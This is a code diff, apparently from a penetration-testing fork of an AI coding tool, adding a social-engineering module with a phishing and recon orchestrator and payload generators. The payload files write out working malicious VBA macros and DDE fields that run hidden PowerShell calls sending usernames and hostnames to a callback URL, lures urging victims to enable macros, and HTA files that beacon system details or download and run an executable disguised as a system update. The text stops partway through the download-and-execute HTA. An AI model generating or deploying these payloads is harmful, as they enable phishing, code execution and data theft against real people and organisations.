+export { SocEngEvents } from "./events"
+export { SocEngStorage } from "./storage"
+export { SocEngProfiles } from "./profiles"
+
+// Email module exports
+export * from "./email"
+
+// Phishing module exports
+export * from "./phishing"
+
+// Pretexting module exports
+export * from "./pretexting"
+
+// Payloads module exports
+export * from "./payloads"
+
+// Recon module exports
+export * from "./recon"
+
+// Awareness module exports
+export * from "./awareness"
+
+// Orchestrator and tool exports
+export { SocEngOrchestrator } from "./orchestrator"
+export { SocEngTool } from "./tool"
diff --git a/packages/opencode/src/pentest/soceng/orchestrator.ts b/packages/opencode/src/pentest/soceng/orchestrator.ts
new file mode 100644
index 00000000000..8930f60b44e
--- /dev/null
+++ b/packages/opencode/src/pentest/soceng/orchestrator.ts
@@ -0,0 +1,411 @@
+/**
+ * @fileoverview Social Engineering Orchestrator
+ *
+ * Orchestrates social engineering assessments and campaigns.
+ *
+ * @module pentest/soceng/orchestrator
+ */
+
+import { SocEngTypes } from "./types"
+import { SocEngStorage } from "./storage"
+import { SocEngProfiles } from "./profiles"
+import { Bus } from "../../bus"
+import { SocEngEvents } from "./events"
+import { EmailValidation } from "./email/validation"
+import { EmailSpoof } from "./email/spoof"
+import { PhishingCampaigns } from "./phishing/campaigns"
+import { PhishingTemplates } from "./phishing/templates"
+import { PhishingTracking } from "./phishing/tracking"
+import { PretextingScenarios } from "./pretexting/scenarios"
+import { PretextingPersonas } from "./pretexting/personas"
+import { EmailRecon } from "./recon/email"
+import { OrgRecon } from "./recon/organization"
+import { AwarenessMetrics } from "./awareness/metrics"
+import { AwarenessReporting } from "./awareness/reporting"
+
+/**
+ * Social engineering orchestrator namespace.
+ */
+export namespace SocEngOrchestrator {
+  // ========== Session Management ==========
+
+  /**
+   * Active session.
+   */
+  export interface Session {
+    id: string
+    type: "phishing" | "pretext" | "recon" | "awareness"
+    targetDomain?: string
+    campaigns: string[]
+    osintData: SocEngTypes.OSINTResult[]
+    startTime: number
+    status: "active" | "paused" | "completed"
+  }
+
+  let activeSession: Session | null = null
+
+  /**
+   * Start a new session.
+   */
+  export function startSession(
+    type: Session["type"],
+    targetDomain?: string
+  ): Session {
+    activeSession = {
+      id: SocEngStorage.createSessionId(),
+      type,
+      targetDomain,
+      campaigns: [],
+      osintData: [],
+      startTime: Date.now(),
+      status: "active",
+    }
+
+    Bus.publish(SocEngEvents.SessionStarted, {
+      sessionId: activeSession.id,
+      type,
+      targetDomain,
+    })
+
+    return activeSession
+  }
+
+  /**
+   * Get active session.
+   */
+  export function getSession(): Session | null {
+    return activeSession
+  }
+
+  /**
+   * End session.
+   */
+  export function endSession(): void {
+    if (activeSession) {
+      activeSession.status = "completed"
+
+      Bus.publish(SocEngEvents.SessionEnded, {
+        sessionId: activeSession.id,
+        duration: Date.now() - activeSession.startTime,
+      })
+
+      activeSession = null
+    }
+  }
+
+  // ========== Email Security Assessment ==========
+
+  /**
+   * Email security assessment options.
+   */
+  export interface EmailAssessmentOptions {
+    domain: string
+    checkSpoofability?: boolean
+    generateLookalikes?: boolean
+    dkimSelectors?: string[]
+  }
+
+  /**
+   * Run email security assessment.
+   */
+  export async function assessEmailSecurity(
+    options: EmailAssessmentOptions,
+    execCommand: (cmd: string) => Promise<{ stdout: string; stderr: string; exitCode: number }>
+  ): Promise<{
+    security: SocEngTypes.EmailSecurityAssessment
+    spoofAssessment?: Awaited<ReturnType<typeof EmailSpoof.assessSpoofVulnerability>>
+    lookalikes?: ReturnType<typeof EmailSpoof.generateLookalikes>
+  }> {
+    // Run email security validation
+    const security = await EmailValidation.assessEmailSecurity(
+      options.domain,
+      execCommand
+    )
+
+    const result: {
+      security: SocEngTypes.EmailSecurityAssessment
+      spoofAssessment?: Awaited<ReturnType<typeof EmailSpoof.assessSpoofVulnerability>>
+      lookalikes?: ReturnType<typeof EmailSpoof.generateLookalikes>
+    } = { security }
+
+    // Assess spoofability
+    if (options.checkSpoofability !== false) {
+      result.spoofAssessment = await EmailSpoof.assessSpoofVulnerability(
+        options.domain,
+        security
+      )
+    }
+
+    // Generate lookalikes
+    if (options.generateLookalikes) {
+      result.lookalikes = EmailSpoof.generateLookalikes(options.domain)
+    }
+
+    return result
+  }
+
+  // ========== Phishing Campaign Management ==========
+
+  /**
+   * Phishing campaign options.
+   */
+  export interface PhishingCampaignOptions {
+    name: string
+    type: SocEngTypes.CampaignType
+    authorization: string
+    profile?: string
+    templateCategory?: string
+    targetDomain?: string
+    targets?: SocEngTypes.Target[]
+  }
+
+  /**
+   * Create and configure phishing campaign.
+   */
+  export async function createPhishingCampaign(
+    options: PhishingCampaignOptions
+  ): Promise<SocEngTypes.Campaign> {
+    // Create campaign
+    const campaign = await PhishingCampaigns.createCampaign({
+      name: options.name,
+      type: options.type,
+      authorization: options.authorization,
+      profile: options.profile,
+      targets: options.targets,
+    })
+
+    // Add to session if active
+    if (activeSession) {
+      activeSession.campaigns.push(campaign.id)
+    }
+
+    // Apply profile configuration
+    if (options.profile) {
+      const profile = SocEngProfiles.getCampaignProfile(options.profile)
+      if (profile) {
+        // Configure based on profile
+        if (profile.templateCategory && !options.templateCategory) {
+          options.templateCategory = profile.templateCategory
+        }
+      }
+    }
+
+    // Add template if category specified
+    if (options.templateCategory) {
+      const category = PhishingTemplates.getCategory(options.templateCategory)
+      if (category && category.templates.length > 0) {
+        const templateDef = category.templates[0]
+        const template = PhishingTemplates.toEmailTemplate(templateDef, {
+          senderDomain: options.targetDomain,
+        })
+        await PhishingCampaigns.addTemplate(campaign.id, template)
+      }
+    }
+
+    return campaign
+  }
+
+  /**
+   * Get campaign statistics.
+   */
+  export async function getCampaignStats(
+    campaignId: string
+  ): Promise<PhishingCampaigns.CampaignStatistics> {
+    return PhishingCampaigns.getStatistics(campaignId)
+  }
+
+  /**
+   * Generate campaign report.
+   */
+  export async function generateCampaignReport(
+    campaignId: string
+  ): Promise<PhishingCampaigns.CampaignReport> {
+    return PhishingCampaigns.generateReport(campaignId)
+  }
+
+  // ========== Pretexting ==========
+
+  /**
+   * Get pretexting scenario.
+   */
+  export function getPretextScenario(
+    scenarioId: string
+  ): PretextingScenarios.ScenarioDefinition | undefined {
+    return PretextingScenarios.getScenario(scenarioId)
+  }
+
+  /**
+   * Get persona for pretext.
+   */
+  export function getPersona(
+    personaId: string
+  ): PretextingPersonas.Persona | undefined {
+    return PretextingPersonas.getPersona(personaId)
+  }
+
+  /**
+   * Get recommended scenarios by difficulty.
+   */
+  export function getScenariosByDifficulty(
+    difficulty: "beginner" | "intermediate" | "advanced"
+  ): PretextingScenarios.ScenarioDefinition[] {
+    return PretextingScenarios.getByDifficulty(difficulty)
+  }
+
+  // ========== Reconnaissance ==========
+
+  /**
+   * Reconnaissance options.
+   */
+  export interface ReconOptions {
+    domain: string
+    targetNames?: string[]
+    emailPattern?: boolean
+    socialMedia?: boolean
+  }
+
+  /**
+   * Run reconnaissance.
+   */
+  export function generateReconQueries(
+    options: ReconOptions
+  ): Record<string, Record<string, string>> {
+    const queries: Record<string, Record<string, string>> = {}
+
+    // Email discovery queries
+    queries.email = EmailRecon.generateSearchQueries(options.domain)
+
+    // Organization queries
+    queries.organization = OrgRecon.getSearchQueries(
+      options.domain.split(".")[0], // Company name from domain
+      options.domain
+    )
+
+    return queries
+  }
+
+  /**
+   * Generate email permutations.
+   */
+  export function generateEmailPermutations(
+    firstName: string,
+    lastName: string,
+    domain: string
+  ): string[] {
+    return EmailRecon.generateAllPermutations(firstName, lastName, domain)
+  }
+
+  // ========== Awareness Metrics ==========
+
+  /**
+   * Get organization metrics.
+   */
+  export async function getOrganizationMetrics(
+    campaigns: SocEngTypes.Campaign[]
+  ): Promise<{
+    phishing: AwarenessMetrics.PhishingMetrics
+    riskScore: number
+    riskLevel: string
+    recommendations: string[]
+  }> {
+    const phishing = AwarenessMetrics.calculatePhishingMetrics(campaigns)
+    const riskScore = AwarenessMetrics.calculateRiskScore(phishing)
+    const riskLevel = AwarenessMetrics.determineRiskLevel(
+      phishing.clickRate,
+      phishing.submitRate
+    )
+    const recommendations = AwarenessMetrics.generateRecommendations(phishing)
+
+    return {
+      phishing,
+      riskScore,
+      riskLevel,
+      recommendations,
+    }
+  }
+
+  /**
+   * Generate executive summary.
+   */
+  export function generateExecutiveSummary(
+    campaigns: SocEngTypes.Campaign[]
+  ): AwarenessReporting.ExecutiveSummary {
+    return AwarenessReporting.generateExecutiveSummary(campaigns)
+  }
+
+  // ========== Available Actions ==========
+
+  /**
+   * List available template categories.
+   */
+  export function listTemplateCategories(): string[] {
+    return PhishingTemplates.getCategories().map((c) => c.id)
+  }
+
+  /**
+   * List available pretext scenarios.
+   */
+  export function listScenarios(): Array<{ id: string; name: string; category: string }> {
+    return PretextingScenarios.getCategories().flatMap((cat) =>
+      cat.scenarios.map((s) => ({
+        id: s.id,
+        name: s.name,
+        category: cat.id,
+      }))
+    )
+  }
+
+  /**
+   * List available personas.
+   */
+  export function listPersonas(): Array<{ id: string; name: string; role: string }> {
+    return PretextingPersonas.getPersonas().map((p) => ({
+      id: p.id,
+      name: p.name,
+      role: p.role,
+    }))
+  }
+
+  /**
+   * List campaign profiles.
+   */
+  export function listCampaignProfiles(): Array<{
+    id: string
+    name: string
+    description: string
+  }> {
+    return SocEngProfiles.CAMPAIGN_PROFILES.map((p) => ({
+      id: p.id,
+      name: p.name,
+      description: p.description,
+    }))
+  }
+
+  // ========== Formatting ==========
+
+  /**
+   * Format session summary.
+   */
+  export function formatSessionSummary(): string {
+    if (!activeSession) {
+      return "No active session"
+    }
+
+    const lines: string[] = []
+    lines.push("Social Engineering Session")
+    lines.push("=".repeat(40))
+    lines.push(`Session ID: ${activeSession.id}`)
+    lines.push(`Type: ${activeSession.type}`)
+    if (activeSession.targetDomain) {
+      lines.push(`Target Domain: ${activeSession.targetDomain}`)
+    }
+    lines.push(`Status: ${activeSession.status}`)
+    lines.push(`Campaigns: ${activeSession.campaigns.length}`)
+    lines.push(`OSINT Records: ${activeSession.osintData.length}`)
+    lines.push(
+      `Duration: ${Math.round((Date.now() - activeSession.startTime) / 60000)} minutes`
+    )
+
+    return lines.join("\n")
+  }
+}
diff --git a/packages/opencode/src/pentest/soceng/payloads/documents.ts b/packages/opencode/src/pentest/soceng/payloads/documents.ts
new file mode 100644
index 00000000000..81395e35408
--- /dev/null
+++ b/packages/opencode/src/pentest/soceng/payloads/documents.ts
@@ -0,0 +1,536 @@
+/**
+ * @fileoverview Malicious Document Payloads
+ *
+ * Document-based payload generation for social engineering tests.
+ *
+ * @module pentest/soceng/payloads/documents
+ */
+
+import { SocEngStorage } from "../storage"
+
+/**
+ * Document payloads namespace.
+ */
+export namespace DocumentPayloads {
+  // ========== Document Types ==========
+
+  /**
+   * Document payload type.
+   */
+  export type DocumentType =
+    | "word-macro"
+    | "excel-macro"
+    | "word-dde"
+    | "excel-dde"
+    | "pdf-link"
+    | "html"
+    | "rtf"
+    | "onenote"
+
+  /**
+   * Document payload definition.
+   */
+  export interface DocumentPayload {
+    id: string
+    name: string
+    type: DocumentType
+    filename: string
+    description: string
+    content: string
+    callbackUrl?: string
+    trackingEnabled: boolean
+    technique: string
+    mitreTactic?: string
+    mitreId?: string
+    notes: string[]
+    createdAt: number
+  }
+
+  // ========== Word Macro Payloads ==========
+
+  /**
+   * Word macro options.
+   */
+  export interface WordMacroOptions {
+    name: string
+    filename: string
+    callbackUrl: string
+    lureContent?: string
+    autoOpen?: boolean
+  }
+
+  /**
+   * Generate Word macro payload.
+   */
+  export function generateWordMacro(options: WordMacroOptions): DocumentPayload {
+    const autoOpenTrigger = options.autoOpen !== false ? "AutoOpen" : "Document_Open"
+
+    const vbaCode = `
+' VBA Macro Payload
+' Technique: AutoOpen macro execution
+' MITRE: T1204.002 - User Execution: Malicious File
+
+Sub ${autoOpenTrigger}()
+    Beacon
+End Sub
+
+Sub Document_Open()
+    Beacon
+End Sub
+
+Sub Beacon()
+    On Error Resume Next
+
+    Dim objShell As Object
+    Dim strUser As String
+    Dim strComp As String
+    Dim strUrl As String
+
+    Set objShell = CreateObject("WScript.Shell")
+
+    strUser = objShell.ExpandEnvironmentStrings("%USERNAME%")
+    strComp = objShell.ExpandEnvironmentStrings("%COMPUTERNAME%")
+    strUrl = "${options.callbackUrl}?u=" & strUser & "&c=" & strComp
+
+    ' Method 1: PowerShell (most reliable)
+    objShell.Run "powershell -WindowStyle Hidden -Command ""Invoke-WebRequest -Uri '" & strUrl & "' -UseBasicParsing""", 0, False
+
+    ' Cleanup
+    Set objShell = Nothing
+End Sub
+`
+
+    const lure = options.lureContent || `
+This document contains protected content.
+
+To view the full document:
+1. Click "Enable Content" or "Enable Macros" in the yellow bar above
+2. The document will display normally
+
+If you don't see the security bar, your organization may have macros disabled.
+Contact IT support for assistance.
+`
+
+    return {
+      id: SocEngStorage.createPayloadId(),
+      name: options.name,
+      type: "word-macro",
+      filename: options.filename.endsWith(".docm")
+        ? options.filename
+        : `${options.filename}.docm`,
+      description: "Word document with VBA macro payload",
+      content: `=== LURE CONTENT ===
+${lure}
+
+=== VBA MACRO CODE ===
+${vbaCode}`,
+      callbackUrl: options.callbackUrl,
+      trackingEnabled: true,
+      technique: "VBA Macro AutoOpen",
+      mitreTactic: "Execution",
+      mitreId: "T1204.002",
+      notes: [
+        "Save as .docm (macro-enabled) or .doc (legacy)",
+        "Lure text should convince user to enable macros",
+        "Test macro execution before deployment",
+        "Consider Protected View bypass techniques",
+      ],
+      createdAt: Date.now(),
+    }
+  }
+
+  // ========== Excel Macro Payloads ==========
+
+  /**
+   * Excel macro options.
+   */
+  export interface ExcelMacroOptions {
+    name: string
+    filename: string
+    callbackUrl: string
+    lureType?: "invoice" | "payroll" | "report" | "data"
+    autoOpen?: boolean
+  }
+
+  /**
+   * Generate Excel macro payload.
+   */
+  export function generateExcelMacro(options: ExcelMacroOptions): DocumentPayload {
+    const vbaCode = `
+' Excel VBA Macro Payload
+' Technique: Workbook_Open macro execution
+' MITRE: T1204.002 - User Execution: Malicious File
+
+Private Sub Workbook_Open()
+    Beacon
+End Sub
+
+Private Sub Auto_Open()
+    Beacon
+End Sub
+
+Sub Beacon()
+    On Error Resume Next
+
+    Dim objShell As Object
+    Dim strCmd As String
+
+    Set objShell = CreateObject("WScript.Shell")
+
+    strCmd = "powershell -WindowStyle Hidden -ExecutionPolicy Bypass -Command """
+    strCmd = strCmd & "Invoke-WebRequest -Uri '${options.callbackUrl}"
+    strCmd = strCmd & "?u=' + $env:USERNAME + '&c=' + $env:COMPUTERNAME"
+    strCmd = strCmd & " -UseBasicParsing"""
+
+    objShell.Run strCmd, 0, False
+
+    Set objShell = Nothing
+End Sub
+`
+
+    const lureContent = getLureByType(options.lureType || "data")
+
+    return {
+      id: SocEngStorage.createPayloadId(),
+      name: options.name,
+      type: "excel-macro",
+      filename: options.filename.endsWith(".xlsm")
+        ? options.filename
+        : `${options.filename}.xlsm`,
+      description: "Excel spreadsheet with VBA macro payload",
+      content: `=== LURE CONTENT (${options.lureType || "data"}) ===
+${lureContent}
+
+=== VBA MACRO CODE (ThisWorkbook) ===
+${vbaCode}`,
+      callbackUrl: options.callbackUrl,
+      trackingEnabled: true,
+      technique: "VBA Macro Workbook_Open",
+      mitreTactic: "Execution",
+      mitreId: "T1204.002",
+      notes: [
+        "Save as .xlsm (macro-enabled) or .xls (legacy)",
+        "Place macro in ThisWorkbook module",
+        `Lure theme: ${options.lureType || "data"}`,
+        "Excel macros may be blocked by default in many orgs",
+      ],
+      createdAt: Date.now(),
+    }
+  }
+
+  /**
+   * Get lure content by type.
+   */
+  function getLureByType(lureType: string): string {
+    const lures: Record<string, string> = {
+      invoice: `
+        INVOICE #INV-2024-XXXX
+
+        This invoice document requires macros to display properly.
+        Please click "Enable Content" to view the full invoice details.
+
+        Amount Due: $X,XXX.XX
+        Due Date: [Date]
+      `,
+      payroll: `
+        CONFIDENTIAL - PAYROLL DATA
+
+        This file contains protected payroll information.
+        Enable macros to decrypt and view the salary data.
+
+        Warning: Unauthorized access is prohibited.
+      `,
+      report: `
+        QUARTERLY REPORT - Q4 2024
+
+        This report contains interactive charts and data.
+        Please enable macros to view the full interactive report.
+
+        Executive Summary will display after enabling.
+      `,
+      data: `
+        DATA EXPORT
+
+        This export file requires macros to decompress the data.
+        Click "Enable Content" to view the extracted data.
+      `,
+    }
+    return lures[lureType] || lures.data
+  }
+
+  // ========== DDE Payloads ==========
+
+  /**
+   * DDE payload options.
+   */
+  export interface DDEOptions {
+    name: string
+    filename: string
+    callbackUrl: string
+    documentType: "word" | "excel"
+  }
+
+  /**
+   * Generate DDE payload.
+   */
+  export function generateDDE(options: DDEOptions): DocumentPayload {
+    const ddeFormula = `=DDE("cmd";"/c powershell -WindowStyle Hidden -Command \\"Invoke-WebRequest -Uri '${options.callbackUrl}?t=dde' -UseBasicParsing\\"";"!A1")`
+
+    const alternativeDDE = `{DDEAUTO c:\\\\windows\\\\system32\\\\cmd.exe "/k powershell -WindowStyle Hidden -ep bypass -Command \\"IWR ${options.callbackUrl}?t=dde\\""}`
+
+    return {
+      id: SocEngStorage.createPayloadId(),
+      name: options.name,
+      type: options.documentType === "word" ? "word-dde" : "excel-dde",
+      filename: options.filename,
+      description: `${options.documentType === "word" ? "Word" : "Excel"} document with DDE payload`,
+      content: `=== DDE PAYLOAD ===
+
+For Excel cell:
+${ddeFormula}
+
+For Word field (CTRL+F9):
+${alternativeDDE}
+
+Instructions:
+1. Create new document
+2. Insert the formula/field
+3. Save and send to target
+4. User will be prompted to update links`,
+      callbackUrl: options.callbackUrl,
+      trackingEnabled: true,
+      technique: "DDE (Dynamic Data Exchange)",
+      mitreTactic: "Execution",
+      mitreId: "T1559.002",
+      notes: [
+        "DDE is mostly blocked in modern Office by default",
+        "May work on older or misconfigured systems",
+        "User must click 'Yes' to update links prompt",
+        "Consider as legacy technique",
+      ],
+      createdAt: Date.now(),
+    }
+  }
+
+  // ========== PDF Payloads ==========
+
+  /**
+   * PDF payload options.
+   */
+  export interface PDFOptions {
+    name: string
+    filename: string
+    linkUrl: string
+    linkText?: string
+    content?: string
+  }
+
+  /**
+   * Generate PDF payload (link-based).
+   */
+  export function generatePDFPayload(options: PDFOptions): DocumentPayload {
+    const pdfContent = `
+%PDF-1.7
+(This is a conceptual representation)
+
+=== PDF PAYLOAD CONCEPT ===
+
+PDF Document: ${options.filename}
+
+The PDF should contain:
+1. Convincing content related to the pretext
+2. A prominent link or button: "${options.linkText || "Click Here"}"
+3. Link destination: ${options.linkUrl}
+
+Content preview:
+${options.content || "The document content should match your pretext theme."}
+
+=== IMPLEMENTATION NOTES ===
+1. Create PDF using legitimate tools (Word, etc.)
+2. Insert hyperlink to malicious URL
+3. Make the link prominent and contextually relevant
+4. Consider using URL shorteners for cleaner appearance
+5. Can add tracking pixel via embedded image reference
+`
+
+    return {
+      id: SocEngStorage.createPayloadId(),
+      name: options.name,
+      type: "pdf-link",
+      filename: options.filename.endsWith(".pdf")
+        ? options.filename
+        : `${options.filename}.pdf`,
+      description: "PDF with malicious link",
+      content: pdfContent,
+      callbackUrl: options.linkUrl,
+      trackingEnabled: true,
+      technique: "PDF embedded link",
+      mitreTactic: "Initial Access",
+      mitreId: "T1566.001",
+      notes: [
+        "No macro execution - relies on user clicking link",
+        "Works universally across PDF readers",
+        "Link should match document context",
+        "Consider PDF icon spoofing for additional effect",
+      ],
+      createdAt: Date.now(),
+    }
+  }
+
+  // ========== HTML Payloads ==========
+
+  /**
+   * HTML payload options.
+   */
+  export interface HTMLOptions {
+    name: string
+    filename: string
+    callbackUrl: string
+    redirectUrl?: string
+    lureType?: "document" | "download" | "login"
+  }
+
+  /**
+   * Generate HTML smuggling payload.
+   */
+  export function generateHTMLPayload(options: HTMLOptions): DocumentPayload {
+    const htmlContent = `<!DOCTYPE html>
+<html>
+<head>
+    <title>Document Viewer</title>
+    <style>
+        body { font-family: Arial, sans-serif; display: flex; justify-content: center; align-items: center; min-height: 100vh; margin: 0; background: #f5f5f5; }
+        .container { text-align: center; padding: 40px; background: white; border-radius: 8px; box-shadow: 0 2px 10px rgba(0,0,0,0.1); }
+        .spinner { width: 40px; height: 40px; border: 4px solid #e0e0e0; border-top-color: #4285f4; border-radius: 50%; animation: spin 1s linear infinite; margin: 0 auto 20px; }
+        @keyframes spin { to { transform: rotate(360deg); } }
+        .btn { display: inline-block; padding: 12px 24px; background: #4285f4; color: white; text-decoration: none; border-radius: 4px; margin-top: 20px; }
+    </style>
+</head>
+<body>
+    <div class="container">
+        <div class="spinner"></div>
+        <h2>Loading Document...</h2>
+        <p>Please wait while we prepare your document.</p>
+        <a href="${options.redirectUrl || options.callbackUrl}" class="btn">Click here if not redirected</a>
+    </div>
+    
+    <img src="${options.callbackUrl}?t=html_open" width="1" height="1" style="display:none">
+    <script>
+        // Track open
+        new Image().src = "${options.callbackUrl}?t=html_exec";
+        // Redirect after delay
+        setTimeout(function() {
+            window.location.href = "${options.redirectUrl || options.callbackUrl}";
+        }, 2000);
+    </script>
+</body>
+</html>`
+
+    return {
+      id: SocEngStorage.createPayloadId(),
+      name: options.name,
+      type: "html",
+      filename: options.filename.endsWith(".html")
+        ? options.filename
+        : `${options.filename}.html`,
+      description: "HTML file with tracking and redirect",
+      content: htmlContent,
+      callbackUrl: options.callbackUrl,
+      trackingEnabled: true,
+      technique: "HTML file execution",
+      mitreTactic: "Initial Access",
+      mitreId: "T1566.001",
+      notes: [
+        "Opens in default browser when double-clicked",
+        "Tracks when file is opened",
+        "Redirects to phishing page automatically",
+        "Can be combined with USB drop or email attachment",
+      ],
+      createdAt: Date.now(),
+    }
+  }
+
+  // ========== Payload Templates ==========
+
+  /**
+   * Common payload configurations.
+   */
+  export const PAYLOAD_TEMPLATES = {
+    invoiceMacro: {
+      name: "Invoice Macro",
+      type: "word-macro" as DocumentType,
+      description: "Fake invoice requiring macro to view",
+      lureTheme: "invoice",
+    },
+    payrollExcel: {
+      name: "Payroll Spreadsheet",
+      type: "excel-macro" as DocumentType,
+      description: "Fake payroll data with macro",
+      lureTheme: "payroll",
+    },
+    documentViewer: {
+      name: "Document Viewer HTML",
+      type: "html" as DocumentType,
+      description: "HTML document viewer with redirect",
+      lureTheme: "document",
+    },
+    signedPDF: {
+      name: "Signed Document PDF",
+      type: "pdf-link" as DocumentType,
+      description: "PDF with link to sign document",
+      lureTheme: "signature",
+    },
+  }
+
+  // ========== Formatting ==========
+
+  /**
+   * Format payload for display.
+   */
+  export function formatPayload(payload: DocumentPayload): string {
+    const lines: string[] = []
+
+    lines.push(`Document Payload: ${payload.name}`)
+    lines.push("=".repeat(50))
+    lines.push(`Type: ${payload.type}`)
+    lines.push(`Filename: ${payload.filename}`)
+    lines.push(`Technique: ${payload.technique}`)
+    if (payload.mitreId) {
+      lines.push(`MITRE ATT&CK: ${payload.mitreId}`)
+    }
+    lines.push(`Tracking: ${payload.trackingEnabled ? "Enabled" : "Disabled"}`)
+    if (payload.callbackUrl) {
+      lines.push(`Callback: ${payload.callbackUrl}`)
+    }
+    lines.push("")
+    lines.push("Description:")
+    lines.push(`  ${payload.description}`)
+    lines.push("")
+    lines.push("Notes:")
+    for (const note of payload.notes) {
+      lines.push(`  • ${note}`)
+    }
+
+    return lines.join("\n")
+  }
+
+  /**
+   * Format payload list.
+   */
+  export function formatPayloadList(payloads: DocumentPayload[]): string {
+    const lines: string[] = []
+
+    lines.push("Document Payloads")
+    lines.push("=".repeat(40))
+
+    for (const payload of payloads) {
+      lines.push("")
+      lines.push(`📄 ${payload.name}`)
+      lines.push(`   Type: ${payload.type}`)
+      lines.push(`   File: ${payload.filename}`)
+      lines.push(`   Technique: ${payload.technique}`)
+    }
+
+    return lines.join("\n")
+  }
+}
diff --git a/packages/opencode/src/pentest/soceng/payloads/hta.ts b/packages/opencode/src/pentest/soceng/payloads/hta.ts
new file mode 100644
index 00000000000..b2bc91420ac
--- /dev/null
+++ b/packages/opencode/src/pentest/soceng/payloads/hta.ts
@@ -0,0 +1,574 @@
+/**
+ * @fileoverview HTA Payload Generation
+ *
+ * HTML Application (HTA) payloads for social engineering.
+ *
+ * @module pentest/soceng/payloads/hta
+ */
+
+import { SocEngStorage } from "../storage"
+
+/**
+ * HTA payloads namespace.
+ */
+export namespace HTAPayloads {
+  // ========== HTA Types ==========
+
+  /**
+   * HTA payload type.
+   */
+  export type HTAPayloadType =
+    | "beacon"
+    | "download-execute"
+    | "reverse-shell"
+    | "credential-prompt"
+
+  /**
+   * HTA payload definition.
+   */
+  export interface HTAPayload {
+    id: string
+    name: string
+    description: string
+    payloadType: HTAPayloadType
+    content: string
+    filename: string
+    callbackUrl?: string
+    targetUrl?: string
+    lureContent?: string
+    notes: string[]
+    createdAt: number
+  }
+
+  // ========== Beacon HTA ==========
+
+  /**
+   * Generate HTA beacon.
+   */
+  export function generateBeaconHTA(options: {
+    name: string
+    callbackUrl: string
+    lureMessage?: string
+  }): HTAPayload {
+    const lure = options.lureMessage || "Please wait while the document loads..."
+
+    const htaContent = `<!DOCTYPE html>
+<html>
+<head>
+    <title>Document Viewer</title>
+    <HTA:APPLICATION
+        ID="DocViewer"
+        APPLICATIONNAME="Document Viewer"
+        BORDER="thin"
+        BORDERSTYLE="normal"
+        CAPTION="yes"
+        CONTEXTMENU="no"
+        ICON=""
+        MAXIMIZEBUTTON="no"
+        MINIMIZEBUTTON="yes"
+        NAVIGABLE="no"
+        SCROLL="no"
+        SCROLLFLAT="no"
+        SELECTION="no"
+        SHOWINTASKBAR="yes"
+        SINGLEINSTANCE="yes"
+        SYSMENU="yes"
+        VERSION="1.0"
+        WINDOWSTATE="normal"
+    />
+    <style>
+        body { font-family: Segoe UI, Arial, sans-serif; background: #f5f5f5; display: flex; align-items: center; justify-content: center; height: 100vh; margin: 0; }
+        .container { text-align: center; background: white; padding: 40px; border-radius: 8px; box-shadow: 0 2px 10px rgba(0,0,0,0.1); }
+        .spinner { width: 40px; height: 40px; border: 4px solid #e0e0e0; border-top-color: #4285f4; border-radius: 50%; animation: spin 1s linear infinite; margin: 0 auto 20px; }
+        @keyframes spin { to { transform: rotate(360deg); } }
+    </style>
+</head>
+<body>
+    <div class="container">
+        <div class="spinner"></div>
+        <h2>${lure}</h2>
+    </div>
+
+    <script language="VBScript">
+        Sub Window_OnLoad()
+            BeaconHome()
+            ' Close after beacon
+            setTimeout "self.close()", 3000
+        End Sub
+
+        Sub BeaconHome()
+            On Error Resume Next
+
+            Dim shell, user, comp, domain, url, http
+
+            Set shell = CreateObject("WScript.Shell")
+
+            user = shell.ExpandEnvironmentStrings("%USERNAME%")
+            comp = shell.ExpandEnvironmentStrings("%COMPUTERNAME%")
+            domain = shell.ExpandEnvironmentStrings("%USERDOMAIN%")
+
+            url = "${options.callbackUrl}?u=" & user & "&c=" & comp & "&d=" & domain & "&t=hta"
+
+            Set http = CreateObject("MSXML2.ServerXMLHTTP")
+            http.Open "GET", url, False
+            http.Send
+
+            Set http = Nothing
+            Set shell = Nothing
+        End Sub
+
+        Sub setTimeout(code, delay)
+            window.setTimeout code, delay
+        End Sub
+    </script>
+</body>
+</html>`
+
+    return {
+      id: SocEngStorage.createPayloadId(),
+      name: options.name,
+      description: "HTA beacon with system information",
+      payloadType: "beacon",
+      content: htaContent,
+      filename: `${sanitizeFilename(options.name)}.hta`,
+      callbackUrl: options.callbackUrl,
+      lureContent: lure,
+      notes: [
+        "HTA executes VBScript without security prompts",
+        "Runs as standalone application",
+        "Closes automatically after beaconing",
+        "Works on Windows with IE/mshta.exe",
+      ],
+      createdAt: Date.now(),
+    }
+  }
+
+  // ========== Download & Execute HTA ==========
+
+  /**
+   * Generate download and execute HTA.
+   */
+  export function generateDownloadExecuteHTA(options: {
+    name: string
+    downloadUrl: string
+    callbackUrl?: string
+    filename?: string
+    lureMessage?: string
+  }): HTAPayload {
+    const lure = options.lureMessage || "Installing required components..."
+    const payloadFilename = options.filename || "update.exe"
+
+    const htaContent = `<!DOCTYPE html>
+<html>
+<head>
+    <title>System Update</title>
+    <HTA:APPLICATION
+        ID="Updater"
+        APPLICATIONNAME="System Update"
+        BORDER="thin"
+        CAPTION="yes"
+        SHOWINTASKBAR="yes"
+        SINGLEINSTANCE="yes"
+        SYSMENU="yes"
+        WINDOWSTATE="normal"
+    />
+    <style>
+        body { font-family: Segoe UI, Arial, sans-serif; background: #f0f0f0; padding: 20px; }
+        .container { background: white; padding: 30px; border-radius: 4px; max-width: 400px; margin: 0 auto; }
+        .progress { height: 20px; background: #e0e0e0; border-radius: 10px; overflow: hidden; }
+        .progress-bar { height: 100%; background: #4caf50; width: 0%; transition: width 0.5s; }
+        .status { margin-top: 15px; color: #666; }
+    </style>
+</head>
+<body>
+    <div class="container">
+        <h3>🔄 ${lure}</h3>
+        <div class="progress"><div class="progress-bar" id="progress"></div></div>
+        <div class="status" id="status">Initializing...</div>
+    </div>
+
+    <script language="VBScript">
+        Dim downloadComplete
+
+        Sub Window_OnLoad()
+            downloadComplete = False
+            UpdateProgress 10, "Connecting to server..."
+            setTimeout "StartDownload", 1000
+        End Sub
+
+        Sub StartDownload()
+            On Error Resume Next
+
+            Dim http, stream, shell, tempPath, filePath
+
+            UpdateProgress 30, "Downloading update..."
+
+            Set http = CreateObject("MSXML2.ServerXMLHTTP")
+            http.Open "GET", "${options.downloadUrl}", False
+            http.Send
+
+            If http.Status = 200 Then
+                UpdateProgress 60, "Saving update..."
+
+                Set shell = CreateObject("WScript.Shell")
+                tempPath = shell.ExpandEnvironmentStrings("%TEMP%")
+                filePath = tempPath & "\\${payloadFilename}"
+
+                Set stream = CreateObject("ADODB.Stream")
+                stream.Open
+                stream.Type = 1
+                stream.Write http.responseBody
+                stream.SaveToFile filePath, 2
+                stream.Close
+
